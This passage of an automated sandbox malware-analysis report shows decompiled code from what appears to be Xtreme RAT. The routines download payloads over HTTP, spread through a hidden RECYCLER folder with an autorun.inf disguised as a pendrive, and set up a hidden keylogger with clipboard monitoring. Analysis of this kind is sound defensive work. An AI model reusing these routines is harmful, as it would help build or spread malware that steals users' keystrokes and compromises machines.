                  				E100037D0( &_v24, L"XTREME");
                  				_v13 = 0;
                  				_t230 = E1000390C(_v8);
                  				_t115 = E10005CA4(_t230);
                  				_t306 = _t115;
                  				if(_t115 == 0) {
                  					L8:
                  					_t296 = 0x14;
                  					_t231 =  &_v4964;
                  					_t299 =  &_v5044;
                  					do {
                  						E100034B0( &_v5052, 0x3d, _t231);
                  						__eflags = _v5052;
                  						if(_v5052 != 0) {
                  							__eflags =  *_t299;
                  							if( *_t299 > 0) {
                  								_push("http://");
                  								E100034B0( &_v5064, 0x3d, _t231);
                  								_push(_v5064);
                  								_push(0x1000aa2c);
                  								E100035A0();
                  								_t260 = _v5060;
                  								E100038FC( &_v5056, _v5060);
                  								_push(_v5056);
                  								asm("cdq");
                  								E10005CCC( &_v5068, 0x3d, _v5060,  *_t299, _t260);
                  								_push(_v5068);
                  								_push(0x1000aa34);
                  								E10005CCC( &_v5072, 0x3d, _t260, _v2524, _v2520);
                  								_push(_v5072);
                  								_push(L".functions");
                  								E100039EC();
                  								E10003898( &_v5076, E1000390C(_v8));
                  								_push(_v5076);
                  								E10003898( &_v5080, E1000390C(_v20));
                  								_pop(_t264);
                  								_t154 = E10005F88(_v5080, _t231, _t264);
                  								__eflags = _t154 - 1;
                  								if(_t154 != 1) {
                  									DeleteFileW(E1000390C(_v8));
                  								} else {
                  									_t159 = E1000390C(_v8);
                  									_t265 =  &_v28;
                  									_v36 = E10005E30(_t159, _t265);
                  									_v32 = _t265;
                  									__eflags = _v32;
                  									if(__eflags != 0) {
                  										if(__eflags > 0) {
                  											goto L16;
                  										}
                  									} else {
                  										__eflags = _v36;
                  										if(_v36 > 0) {
                  											L16:
                  											E10003BE4( &_v20, E10003FD4(_v36, _v32, 2, 0));
                  											E100050D0(E1000390C(_v20), _v28);
                  											_t169 = E10003B94(L"STARTSERVERBUFFER", _v20);
                  											__eflags = _t169;
                  											if(_t169 > 0) {
                  												__eflags = E10003B94(L"ENDSERVERBUFFER", _v20);
                  												if(__eflags > 0) {
                  													E10003B04( &_v20, 0x11, 1, __eflags);
                  													E10003B04( &_v20, 0xf, E1000391C(_v20) - 0xf, __eflags);
                  													E10006234(_v20, _t231,  &_v5084, _v24, _t299, __eflags);
                  													E100037AC(_v12, _v5084);
                  													_push(L"STARTSERVERBUFFER");
                  													_push( *_v12);
                  													_push(L"ENDSERVERBUFFER");
                  													E100039EC();
                  													E10006234(_v20, _t231,  &_v5088, _v24, _t299, __eflags);
                  													_t278 = _v5088;
                  													E100037D0( &_v20, _t278);
                  													_t189 = E1000391C(_v20);
                  													asm("cdq");
                  													_push(_t278);
                  													_push(_t189 + _t189);
                  													_push(E1000390C(_v20));
                  													_t194 = E1000390C(_v8);
                  													_pop(_t279);
                  													E10005EB4(_t194, _t279);
                  													E10005F1C(_v8, _t231,  &_v5088, _t299);
                  													_v13 = 1;
                  												}
                  											}
                  										}
                  									}
                  								}
                  							}
                  						}
                  						_t299 = _t299 + 4;
                  						_t231 = _t231 + 0x7a;
                  						_t296 = _t296 - 1;
                  						__eflags = _t296;
                  					} while (_t296 != 0);
                  				} else {
                  					SetFileAttributesW(_t230, 0x80);
                  					_t280 =  &_v28;
                  					_v36 = E10005E30(_t230, _t280);
                  					_v32 = _t280;
                  					E10003BE4( &_v20, E10003FD4(_v36, _v32, 2, 0));
                  					E100050D0(E1000390C(_v20), _v28);
                  					E10006234(_v20, _t230,  &_v5048, _v24, _t298, _t306);
                  					E100037D0( &_v20, _v5048);
                  					if(E10003B94(L"STARTSERVERBUFFER", _v20) <= 0) {
                  						L7:
                  						DeleteFileW(E1000390C(_v8));
                  						goto L8;
                  					} else {
                  						_t218 = E10003B94(L"ENDSERVERBUFFER", _v20);
                  						_t308 = _t218;
                  						if(_t218 <= 0) {
                  							goto L7;
                  						} else {
                  							E10005F1C(_v8, _t230,  &_v5048, _t298);
                  							E10003B04( &_v20, 0x11, 1, _t308);
                  							E10003B04( &_v20, 0xf, E1000391C(_v20) - 0xf, _t308);
                  							E100037AC(_v12, _v20);
                  							_v13 = 1;
                  						}
                  					}
                  				}
                  				_pop(_t254);
                  				 *[fs:eax] = _t254;
                  				_push(E1000A992);
                  				E10003788( &_v5088, 6);
                  				E100032F0( &_v5064, 2);
                  				E10003770( &_v5056);
                  				E100032CC( &_v5052);
                  				E10003770( &_v5048);
                  				E10003788( &_v24, 2);
                  				return E10003770( &_v8);
                  			}

                  APIs
                  • LoadLibraryA.KERNEL32(URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A5A8
                  • LoadLibraryA.KERNEL32(shell32.dll,URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A5B2
                  • SetFileAttributesW.KERNEL32(00000000,00000080,shell32.dll,URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A5E7
                  • DeleteFileW.KERNEL32(00000000,00000002,00000000,00000000,00000080,shell32.dll,URLMON.DLL,00000000,1000A98B,?,?,?,?,00000000,00000000), ref: 1000A6BA
                    • Part of subcall function 10005F88: URLDownloadToCacheFileW.URLMON(00000000,00000000,?,00000104,00000010,00000000), ref: 10005FD1
                    • Part of subcall function 10005F88: CopyFileW.KERNEL32(?,00000000,00000000,00000000,10006016), ref: 10005FEC
                  • DeleteFileW.KERNEL32(00000000,.functions,?,1000AA34,?,?,1000AA2C,?,http://), ref: 1000A915
                    • Part of subcall function 10005E30: CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E67
                    • Part of subcall function 10005E30: GetFileSize.KERNEL32(00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E71
                    • Part of subcall function 10005E30: ReadFile.KERNEL32(00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E99
                    • Part of subcall function 10005E30: CloseHandle.KERNEL32(00000000,00000000,?,?,?,00000000,00000000,00000000,00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 10005E9F
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$DeleteLibraryLoad$AttributesCacheCloseCopyCreateDownloadHandleReadSize
                  • String ID: .functions$ENDSERVERBUFFER$STARTSERVERBUFFER$URLMON.DLL$XTREME$http://$shell32.dll
                  • API String ID: 1556940775-4263465085
                  • Opcode ID: 4ee3fca3fa4ba668606f9b885bd85ae8f743085f3bd6b7371585acf1e6052cfe
                  • Instruction ID: 095f8cd7e1ad7f54d17a8aaba90678f4abf6843293fa25502bb1c2560b129c41
                  • Opcode Fuzzy Hash: 4ee3fca3fa4ba668606f9b885bd85ae8f743085f3bd6b7371585acf1e6052cfe
                  • Instruction Fuzzy Hash: 3FB14D78A001199BEB11DBA4CC82ADFB7B9FF44380F5081A5F504A765ADB74AF858F50
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 54%
                  			E1000B0D0(intOrPtr* __eax, void* __ebx, void* __ecx, signed int __edx, signed int __esi) {
                  				void* _v1;
                  				char _v8;
                  				char _v12;
                  				intOrPtr _v16;
                  				char _v20;
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				char _v36;
                  				char _v40;
                  				char _v44;
                  				char _v48;
                  				char _v52;
                  				char _v56;
                  				signed char _t60;
                  				signed char _t61;
                  				signed char _t62;
                  				signed char _t63;
                  				void* _t71;
                  				WCHAR* _t80;
                  				void* _t93;
                  				void* _t99;
                  				signed char _t118;
                  				intOrPtr _t121;
                  				intOrPtr _t134;
                  				void* _t143;
                  				void* _t149;
                  				signed int _t151;
                  				intOrPtr _t152;
                  				intOrPtr _t153;
                  
                  				_t148 = __esi;
                  				_t60 = __eax +  *__eax;
                  				 *_t60 =  *_t60 + _t60;
                  				_pop(_t153);
                  				 *_t60 =  *_t60 + _t60;
                  				 *((intOrPtr*)(__ecx + __esi * 4)) =  *((intOrPtr*)(__ecx + __esi * 4)) + _t60;
                  				 *_t60 =  *_t60 + __edx;
                  				 *_t60 =  *_t60 + _t60;
                  				 *_t60 =  *_t60 + _t60;
                  				 *_t60 =  *_t60 + _t60;
                  				 *_t60 =  *_t60 + _t60;
                  				_t61 = _t60 & 0x000000b1;
                  				 *_t61 =  *_t61 + __edx;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				 *_t61 =  *_t61 + _t61;
                  				asm("adc [eax], cl");
                  				 *_t61 =  *_t61 + _t61;
                  				 *((intOrPtr*)(_t61 + __edx)) =  *((intOrPtr*)(_t61 + __edx)) + __ebx;
                  				 *_t61 =  *_t61 + __edx;
                  				asm("clc");
                  				 *_t61 =  *_t61 - _t61;
                  				asm("adc [edx+ebp], al");
                  				 *_t61 =  *_t61 + __edx;
                  				 *_t61 =  *_t61 + __edx;
                  				_t62 = _t61 | 0x0000002a;
                  				 *_t62 =  *_t62 + __edx;
                  				 *__edx =  *__edx;
                  				 *_t62 =  *_t62 + __edx;
                  				asm("fsubr qword [eax]");
                  				 *_t62 =  *_t62 + __edx;
                  				asm("clc");
                  				 *_t62 =  *_t62 - _t62;
                  				asm("adc [ecx+ebp], dh");
                  				 *_t62 =  *_t62 + __edx;
                  				_push(cs);
                  				 *_t62 =  *_t62 + _t62;
                  				 *_t62 =  *_t62 + _t62;
                  				 *0 =  *0 + _t62;
                  				 *_t62 =  *_t62 + _t62;
                  				 *((intOrPtr*)(_t62 + __edx)) =  *((intOrPtr*)(_t62 + __edx));
                  				 *_t62 =  *_t62 + __edx;
                  				_t63 = _t62;
                  				 *_t63 =  *_t63 + _t63;
                  				 *(_t149 + 0x53 + __edx * 2) =  *(_t149 + 0x53 + __edx * 2) | __edx;
                  				asm("popad");
                  				_t151 =  *(__esi - 0x70) * 0x51ec8b55;
                  				_push(_t151);
                  				_t152 = _t153;
                  				_push(0);
                  				_t121 = 6;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t121 = _t121 - 1;
                  					_t155 = _t121;
                  				} while (_t121 != 0);
                  				_t16 =  &_v8;
                  				 *_t16 = _t121;
                  				_push(__ebx);
                  				_v8 =  *_t16;
                  				_t118 = _t63;
                  				E10003C28( &_v8);
                  				_push(_t152);
                  				_push(0x1000b2fa);
                  				 *[fs:eax] = _t153;
                  				E10003988( &_v12, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\", _v8, _t155);
                  				_t71 = E10005690(E1000390C(_v12),  *[fs:eax]);
                  				_t156 = _t71;
                  				if(_t71 != 0) {
                  					E1000B038( *((intOrPtr*)(_t118 + 4)), _t118, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\",  &_v24);
                  					_t126 = _v24;
                  					E10003988( &_v20, _v24, _v12, _t156);
                  					_t80 = E1000390C(_v20);
                  					CopyFileW(E1000390C( *((intOrPtr*)(_t118 + 4))), _t80, 0);
                  					_push(L"[autorun]\r\n;open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                  					E1000B038( *((intOrPtr*)(_t118 + 4)), _t118, _v24,  &_v28);
                  					_push(_v28);
                  					_push(0x1000b418);
                  					_push(L"icon=shell32.dll,4");
                  					_push(0x1000b418);
                  					_push(L"shellexecute=");
                  					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                  					E1000B038( *((intOrPtr*)(_t118 + 4)), _t118, _v24,  &_v32);
                  					_push(_v32);
                  					_push(0x1000b418);
                  					_push(L"label=PENDRIVE");
                  					_push(0x1000b418);
                  					_push(L"action=Open folder to view files");
                  					_push(0x1000b418);
                  					_push(L"shell\\Open=Open");
                  					_push(0x1000b418);
                  					_push(L"shell\\Open\\command=");
                  					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                  					E1000B038( *((intOrPtr*)(_t118 + 4)), _t118, _t126,  &_v36);
                  					_push(_v36);
                  					_push(0x1000b418);
                  					_push(L"shell\\Open\\Default=1");
                  					E100039EC();
                  					_t93 = E1000391C(_v16) + _t92;
                  					_t157 = _t93;
                  					asm("cdq");
                  					_push(0x14);
                  					_push(_t93);
                  					_push(E1000390C(_v16));
                  					E10003988( &_v40, L"autorun.inf", _v8, _t93);
                  					_t99 = E1000390C(_v40);
                  					_pop(_t143);
                  					E10005EB4(_t99, _t143);
                  					E10003988( &_v44, L"autorun.inf", _v8, _t93);
                  					E10005F1C(_v44, _t118, L"autorun.inf", __esi);
                  					_t129 = L"RECYCLER\\";
                  					E10003988( &_v48, L"RECYCLER\\", _v8, _t93);
                  					E10005F1C(_v48, _t118, L"RECYCLER\\", __esi);
                  					E10005F1C(_v12, _t118, L"RECYCLER\\", __esi);
                  					E1000B038( *((intOrPtr*)(_t118 + 4)), _t118, _t129,  &_v56);
                  					E10003988( &_v52, _v56, _v12, _t157);
                  					E10005F1C(_v52, _t118, _v56, _t148);
                  				}
                  				_pop(_t134);
                  				 *[fs:eax] = _t134;
                  				_push(E1000B301);
                  				return E10003788( &_v56, 0xd);
                  			}

                  Instruction addresses (decompiled-code listing column): 0x1000b0d0 to 0x1000b2f9

                  APIs
                  • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,1000B2FA,?,?,00000000,00000000), ref: 1000B1C1
                    • Part of subcall function 10005F1C: GetFileAttributesW.KERNEL32(00000000,00000000,10005F73,?,?,?,?,?,1000C491,00000000,00000000,?,00000002,?,?,.dat), ref: 10005F46
                    • Part of subcall function 10005F1C: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,10005F73,?,?,?,?,?,1000C491,00000000,00000000,?,00000002,?), ref: 10005F58
                    • Part of subcall function 10003788: SysFreeString.OLEAUT32(?), ref: 1000379B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$Attributes$CopyFreeString
                  • String ID: RECYCLER\$RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$action=Open folder to view files$autorun.inf$icon=shell32.dll,4$label=PENDRIVE$shell\Open=Open$shell\Open\Default=1$shell\Open\command=$shellexecute=
                  • API String ID: 1359780422-631342129
                  • Opcode ID: 13ecfe44ea8818081acd79cdab56d55be9f714c6c0a79ac0d907a72402bacc2f
                  • Instruction ID: e38e5125926d32c1d26ff353fbb275c64c03e2d6fa0b8cc01eec99beb1e39287
                  • Opcode Fuzzy Hash: 13ecfe44ea8818081acd79cdab56d55be9f714c6c0a79ac0d907a72402bacc2f
                  • Instruction Fuzzy Hash: CA616334909688AFEB03DF64CC519DEBF75DF46280B5580E6F040AB15BD774AE05CB61
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 77%
                  			E100093E4(void* __ebx, void* __edi, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				char _v16;
                  				intOrPtr _v40;
                  				intOrPtr _t13;
                  				intOrPtr _t18;
                  				intOrPtr _t21;
                  				intOrPtr _t27;
                  				void* _t30;
                  				int _t32;
                  				intOrPtr _t33;
                  				intOrPtr _t36;
                  				intOrPtr _t41;
                  				void* _t44;
                  				long _t45;
                  				int _t46;
                  				void* _t47;
                  				void* _t61;
                  				intOrPtr _t66;
                  				char* _t69;
                  				intOrPtr _t70;
                  				int _t74;
                  				void* _t75;
                  				void* _t79;
                  				void* _t80;
                  				intOrPtr* _t83;
                  
                  				_t80 = __esi;
                  				_t79 = __edi;
                  				_t61 = __ebx;
                  				_push(0);
                  				_push(0);
                  				_push(0);
                  				_push(_t83);
                  				_push(0x100095de);
                  				_push( *[fs:eax]);
                  				 *[fs:eax] = _t83;
                  				E10008D4C(0);
                  				E100037D0( &_v8, L"XtremeKeylogger");
                  				if( *0x1000f688 == 0) {
                  					_t62 = E1000390C(_v8);
                  					 *0x1000f688 = E10006510(_t58, 1, E10008568);
                  				}
                  				_t13 =  *0x1000f688; // 0x0
                  				ShowWindow(E1000662C(_t13), 0);
                  				_t69 = L"qualquercoisarsrsr";
                  				E100037AC(0x1000f6d0, _t69);
                  				_t18 =  *0x1000f684; // 0x0
                  				SetFileAttributesW(E1000390C(_t18), 0x80);
                  				_t21 =  *0x1000f684; // 0x0
                  				 *0x1000e0b8 = CreateFileW(E1000390C(_t21), 0xc0000000, 3, 0, 4, 0, 0);
                  				if( *0x1000e0b8 != 0xffffffff) {
                  					_t86 =  *0x1000f6c1 - 1;
                  					if( *0x1000f6c1 == 1) {
                  						 *0x1000f6c4 = E10006788(_t61, _t79, _t80, _t86);
                  						 *0x1000f6c8 = _t69;
                  						_t44 =  *0x1000e0b8; // 0x0
                  						_t45 = GetFileSize(_t44, 0);
                  						_push(0);
                  						_push(_t45);
                  						_t46 =  *0x1000f6c4; // 0x0
                  						_t74 =  *0x1000f6c8; // 0x0
                  						_t47 = E10003FB0(_t46, _t74, 2, 0);
                  						if(_t74 != _v40) {
                  							_pop(_t75);
                  							if(__eflags > 0) {
                  								goto L8;
                  							}
                  						} else {
                  							_t88 = _t47 -  *_t83;
                  							_pop(_t75);
                  							if(_t47 >  *_t83) {
                  								L8:
                  								 *0x1000f6c4 = 0;
                  								 *0x1000f6c8 = 0;
                  							}
                  						}
                  						E10006710( &_v12, _t62, _t75,  *0x1000f6c4,  *0x1000f6c8);
                  						_t66 =  *0x1000f6b4; // 0x0
                  						E10003988( &_v16, _t66, L"SOFTWARE\\", _t88);
                  						E1000577C(0x80000001, _t61, L"LastSize", _v16, _t80, _t88, 2, _v12);
                  					}
                  					_t27 =  *0x1000f684; // 0x0
                  					SetFileAttributesW(E1000390C(_t27), 7);
                  					_t30 =  *0x1000e0b8; // 0x0
                  					SetFilePointer(_t30, 0, 0, 2);
                  					_t32 =  *0x1000f698; // 0x0
                  					_t33 =  *0x1000f688; // 0x0
                  					SendMessageA(E1000662C(_t33), _t32, 0, 0);
                  					_t36 =  *0x1000f688; // 0x0
                  					SetClipboardViewer(E1000662C(_t36));
                  					if( *0x1000f6c1 == 1) {
                  						if( *0x1000e0b0 != 0) {
                  							_t41 =  *0x1000e0b0; // 0x0
                  							E10006768(_t41);
                  						}
                  						 *0x1000e0b0 = E10006744(E10009204, 0, 0);
                  					}
                  				}
                  				_pop(_t70);
                  				 *[fs:eax] = _t70;
                  				_push(E100095E5);
                  				return E10003788( &_v16, 3);
                  			}

                  Instruction addresses (decompiled-code listing column): 0x100093e4 to 0x100095dd

                  APIs
                    • Part of subcall function 10008D4C: SendMessageA.USER32(00000000,0000C1BC,00000000,00000000), ref: 10008D6F
                    • Part of subcall function 10008D4C: CloseHandle.KERNEL32(00000000,1000C6A4,?,00000000,00000000,?,00000002,?,?,.dat,?,1000C958,?,.xtr,?,1000C958), ref: 10008D83
                  • ShowWindow.USER32(00000000,00000000,00000000,100095DE,?,00000000,00000000,00000000,?,1000C659,00000000,00000000,?,00000002,?,?), ref: 10009443
                  • SetFileAttributesW.KERNEL32(00000000,00000080,00000000,00000000,00000000,100095DE,?,00000000,00000000,00000000,?,1000C659,00000000,00000000,?,00000002), ref: 10009467
                  • CreateFileW.KERNEL32(00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000,00000000,00000000,100095DE,?,00000000,00000000), ref: 10009486
                  • GetFileSize.KERNEL32(00000000,00000000,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000,00000000,00000000,100095DE), ref: 100094C3
                  • SetFileAttributesW.KERNEL32(00000000,00000007,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000,00000000,00000000,100095DE), ref: 10009554
                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,00000000,00000007,00000000,C0000000,00000003,00000000,00000004,00000000,00000000,00000000,00000080,00000000), ref: 10009565
                  • SendMessageA.USER32(00000000,00000000,00000000,00000000), ref: 1000957F
                  • SetClipboardViewer.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000002,00000000,00000007,00000000,C0000000,00000003,00000000,00000004), ref: 1000958F
                    • Part of subcall function 10006510: GetDesktopWindow.USER32 ref: 10006571
                    • Part of subcall function 10006510: GetWindowRect.USER32 ref: 10006577
                    • Part of subcall function 10006510: GetModuleHandleA.KERNEL32(00000000,00000000,?,?,?), ref: 1000657E
                    • Part of subcall function 10006510: RegisterClassW.USER32 ref: 1000658A
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$Window$AttributesHandleMessageSend$ClassClipboardCloseCreateDesktopModulePointerRectRegisterShowSizeViewer
                  • String ID: LastSize$SOFTWARE\$XtremeKeylogger$qualquercoisarsrsr
                  • API String ID: 411803610-193067991
                  • Opcode ID: 676dcd07bedc78bc966ac9f8878885fe89c124370f656291f037c9e9c79c44c2
                  • Instruction ID: e10228e688af51e092dac2c6f3dee7a218e45a64ed0b3a8379d93de067ea2b0a
                  • Opcode Fuzzy Hash: 676dcd07bedc78bc966ac9f8878885fe89c124370f656291f037c9e9c79c44c2
                  • Instruction Fuzzy Hash: 86415E78604251AFF711EB70CC92F6E37A9E7483C0F518029F144AB6FECEB6A8419751
                  Uniqueness

                  Uniqueness Score: -1.00%

                  C-Code - Quality: 42%
                  			E1000B140(void* __eax, void* __ebx, void* __ecx, void* __esi) {
                  				char _v8;
                  				char _v12;
                  				intOrPtr _v16;
                  				char _v20;
                  				char _v24;
                  				char _v28;
                  				char _v32;
                  				char _v36;
                  				char _v40;
                  				char _v44;
                  				char _v48;
                  				char _v52;
                  				char _v56;
                  				void* _t52;
                  				WCHAR* _t61;
                  				void* _t74;
                  				void* _t80;
                  				void* _t99;
                  				intOrPtr _t101;
                  				intOrPtr _t112;
                  				void* _t121;
                  				intOrPtr _t128;
                  				intOrPtr _t129;
                  
                  				_t126 = __esi;
                  				_t128 = _t129;
                  				_t101 = 6;
                  				do {
                  					_push(0);
                  					_push(0);
                  					_t101 = _t101 - 1;
                  					_t130 = _t101;
                  				} while (_t101 != 0);
                  				_t1 =  &_v8;
                  				 *_t1 = _t101;
                  				_v8 =  *_t1;
                  				_t99 = __eax;
                  				E10003C28( &_v8);
                  				_push(_t128);
                  				_push(0x1000b2fa);
                  				 *[fs:eax] = _t129;
                  				E10003988( &_v12, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\", _v8, _t130);
                  				_t52 = E10005690(E1000390C(_v12),  *[fs:eax]);
                  				_t131 = _t52;
                  				if(_t52 != 0) {
                  					E1000B038( *((intOrPtr*)(_t99 + 4)), _t99, L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\",  &_v24);
                  					_t106 = _v24;
                  					E10003988( &_v20, _v24, _v12, _t131);
                  					_t61 = E1000390C(_v20);
                  					CopyFileW(E1000390C( *((intOrPtr*)(_t99 + 4))), _t61, 0);
                  					_push(L"[autorun]\r\n;open=RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                  					E1000B038( *((intOrPtr*)(_t99 + 4)), _t99, _v24,  &_v28);
                  					_push(_v28);
                  					_push(0x1000b418);
                  					_push(L"icon=shell32.dll,4");
                  					_push(0x1000b418);
                  					_push(L"shellexecute=");
                  					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                  					E1000B038( *((intOrPtr*)(_t99 + 4)), _t99, _v24,  &_v32);
                  					_push(_v32);
                  					_push(0x1000b418);
                  					_push(L"label=PENDRIVE");
                  					_push(0x1000b418);
                  					_push(L"action=Open folder to view files");
                  					_push(0x1000b418);
                  					_push(L"shell\\Open=Open");
                  					_push(0x1000b418);
                  					_push(L"shell\\Open\\command=");
                  					_push(L"RECYCLER\\S-1-5-21-1482476501-3352491937-682996330-1013\\");
                  					E1000B038( *((intOrPtr*)(_t99 + 4)), _t99, _t106,  &_v36);
                  					_push(_v36);
                  					_push(0x1000b418);
                  					_push(L"shell\\Open\\Default=1");
                  					E100039EC();
                  					_t74 = E1000391C(_v16) + _t73;
                  					_t132 = _t74;
                  					asm("cdq");
                  					_push(0x14);
                  					_push(_t74);
                  					_push(E1000390C(_v16));
                  					E10003988( &_v40, L"autorun.inf", _v8, _t74);
                  					_t80 = E1000390C(_v40);
                  					_pop(_t121);
                  					E10005EB4(_t80, _t121);
                  					E10003988( &_v44, L"autorun.inf", _v8, _t74);
                  					E10005F1C(_v44, _t99, L"autorun.inf", __esi);
                  					_t109 = L"RECYCLER\\";
                  					E10003988( &_v48, L"RECYCLER\\", _v8, _t74);
                  					E10005F1C(_v48, _t99, L"RECYCLER\\", __esi);
                  					E10005F1C(_v12, _t99, L"RECYCLER\\", __esi);
                  					E1000B038( *((intOrPtr*)(_t99 + 4)), _t99, _t109,  &_v56);
                  					E10003988( &_v52, _v56, _v12, _t132);
                  					E10005F1C(_v52, _t99, _v56, _t126);
                  				}
                  				_pop(_t112);
                  				 *[fs:eax] = _t112;
                  				_push(E1000B301);
                  				return E10003788( &_v56, 0xd);
			}

                  Instruction addresses: 0x1000b140 0x1000b141 0x1000b144 0x1000b149 0x1000b149 0x1000b14b 0x1000b14d 0x1000b14d 0x1000b14d 0x1000b150 0x1000b150 0x1000b154 0x1000b157 0x1000b15c 0x1000b163 0x1000b164 0x1000b16c 0x1000b17a 0x1000b187 0x1000b18c 0x1000b18e 0x1000b19c 0x1000b1a1 0x1000b1aa 0x1000b1b2 0x1000b1c1 0x1000b1c6 0x1000b1d1 0x1000b1d6 0x1000b1d9 0x1000b1de 0x1000b1e3 0x1000b1e8 0x1000b1ed 0x1000b1f8 0x1000b1fd 0x1000b200 0x1000b205 0x1000b20a 0x1000b20f 0x1000b214 0x1000b219 0x1000b21e 0x1000b223 0x1000b228 0x1000b233 0x1000b238 0x1000b23b 0x1000b240 0x1000b24d 0x1000b25a 0x1000b25a 0x1000b25c 0x1000b25d 0x1000b25e 0x1000b267 0x1000b273 0x1000b27b 0x1000b280 0x1000b281 0x1000b291 0x1000b299 0x1000b2a1 0x1000b2a9 0x1000b2b1 0x1000b2b9 0x1000b2c4 0x1000b2d2 0x1000b2da 0x1000b2da 0x1000b2e1 0x1000b2e4 0x1000b2e7 0x1000b2f9

                  APIs
                  • CopyFileW.KERNEL32(00000000,00000000,00000000,00000000,1000B2FA,?,?,00000000,00000000), ref: 1000B1C1
                    • Part of subcall function 10005F1C: GetFileAttributesW.KERNEL32(00000000,00000000,10005F73,?,?,?,?,?,1000C491,00000000,00000000,?,00000002,?,?,.dat), ref: 10005F46
                    • Part of subcall function 10005F1C: SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,10005F73,?,?,?,?,?,1000C491,00000000,00000000,?,00000002,?), ref: 10005F58
                    • Part of subcall function 10003788: SysFreeString.OLEAUT32(?), ref: 1000379B
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.296449823.0000000010001000.00000080.00020000.sdmp, Offset: 10000000, based on PE: true
                  • Associated: 00000000.00000002.296445717.0000000010000000.00000002.00020000.sdmp
                  • Associated: 00000000.00000002.296460173.000000001000E000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296468274.0000000010044000.00000040.00020000.sdmp
                  • Associated: 00000000.00000002.296472928.0000000010048000.00000080.00020000.sdmp
                  • Associated: 00000000.00000002.296483936.0000000010056000.00000008.00020000.sdmp
                  • Associated: 00000000.00000002.296489316.0000000010058000.00000004.00020000.sdmp
                  Yara matches
                  Similarity
                  • API ID: File$Attributes$CopyFreeString
                  • String ID: RECYCLER\$RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$[autorun];open=RECYCLER\S-1-5-21-1482476501-3352491937-682996330-1013\$action=Open folder to view files$autorun.inf$icon=shell32.dll,4$label=PENDRIVE$shell\Open=Open$shell\Open\Default=1$shell\Open\command=$shellexecute=
                  • API String ID: 1359780422-631342129
